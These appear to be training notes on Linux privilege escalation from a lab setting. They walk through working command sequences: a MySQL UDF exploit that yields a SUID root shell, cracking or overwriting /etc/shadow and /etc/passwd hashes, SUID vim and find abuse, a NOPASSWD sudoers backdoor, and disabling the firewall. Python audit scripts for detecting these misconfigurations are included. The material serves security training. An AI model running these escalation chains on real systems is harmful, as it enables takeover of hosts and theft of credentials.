Linux PrivEsc

Linux Privilege Escalation

Service Exploits

The MySQL service is running as root and the "root" user for the service does not have a password assigned. We can use a popular exploit that takes advantage of User Defined Functions (UDFs) to run system commands as root via the MySQL service.

exploiting MySQL

Change into the /home/user/tools/mysql-udf directory:

cd /home/user/tools/mysql-udf

Compile the raptor_udf2.c exploit code using the following commands:

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Connect to the MySQL service as the root user with a blank password:

mysql -u root

Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit:

use mysql; create table foo(line blob); insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so')); select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; create function do_system returns integer soname 'raptor_udf2.so';

Use the function to copy /bin/bash to /tmp/rootbash and set the SUID permission:

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Exit out of the MySQL shell (type exit or \q and press Enter) and run the /tmp/rootbash executable with -p to gain a shell running with root privileges:

/tmp/rootbash -p

Remember to remove the /tmp/rootbash executable and exit out of the root shell before continuing as you will create this file again later in the room!

rm /tmp/rootbash
exit

Weak File Permissions - Readable /etc/shadow

The /etc/shadow file contains user password hashes and is usually readable only by the root user.

Note that the /etc/shadow file on the VM is world-readable:

ls -l /etc/shadow

View the contents of the /etc/shadow file:

cat /etc/shadow

Each line of the file represents a user. A user's password hash (if they have one) can be found between the first and second colons (:) of each line.

Save the root user's hash to a file called hash.txt on your Kali VM and use John the Ripper to crack it. You may have to unzip /usr/share/wordlists/rockyou.txt.gz first and run the command using sudo, depending on your version of Kali:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Switch to the root user, using the cracked password:

su root

Remember to exit out of the root shell before continuing!

Weak File Permissions - Writable /etc/shadow

The /etc/shadow file contains user password hashes and is usually readable only by the root user.

Note that the /etc/shadow file on the VM is world-writable:

ls -l /etc/shadow

Generate a new password hash with a password of your choice:

mkpasswd -m sha-512 newpasswordhere

Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.

Switch to the root user, using the new password:

su root

Remember to exit out of the root shell before continuing!

Weak File Permissions - Writable /etc/passwd

The /etc/passwd file contains information about user accounts. It is world-readable, but usually only writable by the root user. Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.

Note that the /etc/passwd file is world-writable:

ls -l /etc/passwd

Generate a new password hash with a password of your choice:

openssl passwd newpasswordhere

Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user's row (replacing the "x").

Switch to the root user, using the new password:

su root

Alternatively, copy the root user's row and append it to the bottom of the file, changing the first instance of the word "root" to "newroot" and placing the generated password hash between the first and second colon (replacing the "x").

Now switch to the newroot user, using the new password:

su newroot

Remember to exit out of the root shell before continuing!
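The three weak-permission cases above are easy to audit for. The following is an added example, not part of the original room: it checks passwd-format text for a hash placed directly in the password field and for extra UID 0 accounts (the "newroot" trick), and checks file permission bits for a world-readable /etc/shadow or a world-writable /etc/passwd. The sample passwd content is constructed; audit_live() reads the real file on the host it runs on.

```python
import os
import stat

# Constructed sample of /etc/passwd after the two edits described above:
# root's "x" replaced by a hash, and an appended "newroot" row with UID 0.
SAMPLE_PASSWD = """\
root:$6$saltsalt$constructedhash:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
user01:x:1000:1000:user01:/home/user01:/bin/bash
newroot:$6$saltsalt$constructedhash:0:0:root:/root:/bin/bash
"""

PLACEHOLDERS = {"x", "*", "!", "!!", ""}   # values meaning "no hash stored here"

def audit_passwd(text):
    """Return (line_no, reason) findings for passwd-format text."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, "malformed row"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw not in PLACEHOLDERS:          # a real hash here bypasses /etc/shadow
            findings.append((n, f"{name}: password hash stored in /etc/passwd"))
        if uid == "0" and name != "root":   # a second superuser account
            findings.append((n, f"{name}: extra UID 0 account"))
    return findings

def audit_mode(path, mode):
    """Flag permission bits that make /etc/passwd or /etc/shadow attackable; mode is the permission part of st_mode, e.g. 0o644."""
    group_other_write = stat.S_IWGRP | stat.S_IWOTH
    group_other_read = stat.S_IRGRP | stat.S_IROTH
    findings = []
    if mode & group_other_write:
        findings.append(f"{path}: writable by group/other ({oct(mode)})")
    if path.endswith("shadow") and mode & group_other_read:
        findings.append(f"{path}: readable by group/other ({oct(mode)})")
    return findings

def audit_live(path="/etc/passwd"):
    """Run both checks against a real file (content check only makes sense for /etc/passwd)."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path) as f:
        return audit_mode(path, mode) + audit_passwd(f.read())
```

For /etc/shadow, run audit_mode() on its mode only: its content needs no check beyond the permission bits, and the file itself should not be readable from an unprivileged audit account.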

Lab:

Understand the scenario

You are responsible for ensuring that server configurations for your organization are secure. You believe one of the servers has been configured in a way that grants administrative privileges to programs that could be exploited. First, you will deliberately configure the Vim text editor in a way that will allow security breaches, and then you will test to see how this configuration can be exploited. Next, you will use elevated privileges to reset the password of the root user, restart a service, disable the firewall, and access password hashes. Finally, you will grant administrative privileges to the find command, and then you will exploit the administrative privileges by running commands as the root user, and then accessing password hashes.

Understand your environment

You will use a default installation of CentOS 7 Linux with the Server with GUI package installed. Non-privileged accounts have been created for you. You will be guided through the process of adding software if necessary.

  • Open the Terminal, and then run the following command to find programs that execute with administrative privileges: find / -perm -u=s -type f 2>/dev/null

    • Run the following command to attempt to view the /etc/shadow file: cat /etc/shadow

      The /etc/shadow file is the storage location for the encrypted user account passwords. By default, only the system administrator can view the file contents. You should receive an access denied message because you are currently signed in using an account that does not have administrative privileges.

    • Run the following command to switch to the root user account, and then when prompted, enter P@ssw0rd123 as the password: su - root

    • Run the following commands to configure Vim to run with administrative privileges:
      chmod u+s /usr/bin/vim
      chmod u+s /bin/vim

    • Enter exit to return to the user01 account.

    • Run the following command to find programs that run with administrative privileges, and to include a search for Vim: find / -perm -u=s -type f 2>/dev/null | grep vim

  • Run the following command to open the /etc/sudoers file by using the Vim text editor: vim /etc/sudoers

    This file allows for the delegation of administrative privileges. The entry you will make now delegates access to all commands on the system, as if you were the system administrator (root user).

  • Press Shift G to move to the end of the file, and then press i to enter Insert mode in Vim.

  • At the end of the file, on a new line, enter the following text: %user01 ALL=(ALL) NOPASSWD:ALL

    You must delete the # that is automatically placed at the start of each line!

  • Press Esc.

  • Enter the following command to force Vim to save the changes, and then exit Vim: :wq!

    You have now delegated all system administrator privileges to the user01 account. This exploits the security vulnerability you created when you configured Vim in the first activity, granting it the ability to run with the system administrator credentials.

Use elevated privileges to take control of a server

  • Run the following command to reset the password: sudo passwd root

  • When prompted, enter password as the new password. You will be prompted to enter the new password twice.

    This action will lock the legitimate system administrator out of the server.

  • Run the following command to restart the sshd service: sudo systemctl restart sshd

  • Run the following commands to stop, and then disable the firewall:
    sudo systemctl stop firewalld
    sudo systemctl disable firewalld

  • Run the following command to view the encrypted passwords stored in the /etc/shadow file: sudo cat /etc/shadow

    This would allow you to copy the encrypted passwords into a password cracking program like John the Ripper.

    The examples in this task are very basic examples of malicious activities that might occur on a vulnerable system.

  • Run the following commands to access a command prompt that has root privileges:
    vim file.txt
    :set shell=/bin/bash
    :shell

    Any command run at this command prompt runs with the root user's authority.

  • Enter exit, and then in Vim, type :q! and press Enter to return to the user01 account.

    Vim provides this warning to indicate you have attempted to edit a read-only file. The :q! command quits Vim without saving changes to the file, and you must press Enter to confirm.

Create a security vulnerability by configuring the find command

  • Run the following command to get root privileges, and then when prompted, enter password as the password: su - root

  • Run the following command to configure the find command to run using administrative privileges: chmod u+s /bin/find

    This configuration creates a security vulnerability that will allow you to run the find command with root privileges. The find command can run a command after the search completes. In this case, that command executes using root privileges.

  • Enter exit to switch back to the user01 account.

  • Run the following command to create an empty file named file.txt: touch file.txt

  • Run the following command to verify that you have root privileges: find file.txt -exec whoami \;

  • Run the following command to exploit the encrypted passwords on the system: find /etc/shadow -exec cat /etc/shadow \;

    Observe the encrypted passwords in the /etc/shadow file. This technique would allow you to copy the encrypted passwords into a password cracking program like John the Ripper.
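Both misconfigurations the lab creates (a NOPASSWD:ALL sudoers rule and setuid bits on vim and find) show up in two places a periodic audit can read: /etc/sudoers and the output of the find command from the first step. The script below is an added example, not part of the lab: it flags passwordless sudo rules that grant ALL or one of the shell-capable programs the lab uses, and diffs the setuid list against a baseline. The sudoers text, the find output and the BASELINE_SUID set are all constructed assumptions; build the real baseline from a clean install of the same image.

```python
import os
import re

# Constructed sample of /etc/sudoers content, including the lab's entry.
SAMPLE_SUDOERS = """\
## Allow root to run any commands anywhere
root    ALL=(ALL)       ALL
%wheel  ALL=(ALL)       ALL
%user01 ALL=(ALL) NOPASSWD:ALL
"""

# Constructed output of: find / -perm -u=s -type f 2>/dev/null
SAMPLE_SUID = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/vim
/bin/find
"""

# Assumed baseline of setuid binaries for the host; record the real one from a
# clean install of the same image before comparing.
BASELINE_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount"}

# Programs the lab shows turning into a root shell once setuid or NOPASSWD.
SHELL_CAPABLE = {"vim", "vi", "find"}

def risky_sudoers(text):
    """Return (line_no, reason) for NOPASSWD rules granting ALL or a shell-capable command."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        rule = line.split("#", 1)[0].strip()        # drop comments
        if not rule or rule.startswith("Defaults") or "NOPASSWD" not in rule:
            continue
        m = re.match(r"(\S+)\s+\S+=\([^)]*\)\s*NOPASSWD:\s*(.*)", rule)
        who, cmds = (m.group(1), m.group(2).strip()) if m else (rule.split()[0], "?")
        names = {os.path.basename(c.strip()) for c in cmds.split(",")}
        if cmds == "ALL" or names & SHELL_CAPABLE:
            findings.append((n, f"{who}: passwordless sudo for {cmds}"))
    return findings

def unexpected_suid(find_output, baseline=BASELINE_SUID):
    """Return setuid paths missing from the baseline, shell-capable ones first."""
    extra = [p for p in find_output.split() if p not in baseline]
    return sorted(extra, key=lambda p: (os.path.basename(p) not in SHELL_CAPABLE, p))
```

On a live host, feed risky_sudoers() the contents of /etc/sudoers and any files under /etc/sudoers.d, and feed unexpected_suid() the real find output; any finding is a change to investigate, not a verdict on its own.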

Sudo - Shell Escape Sequences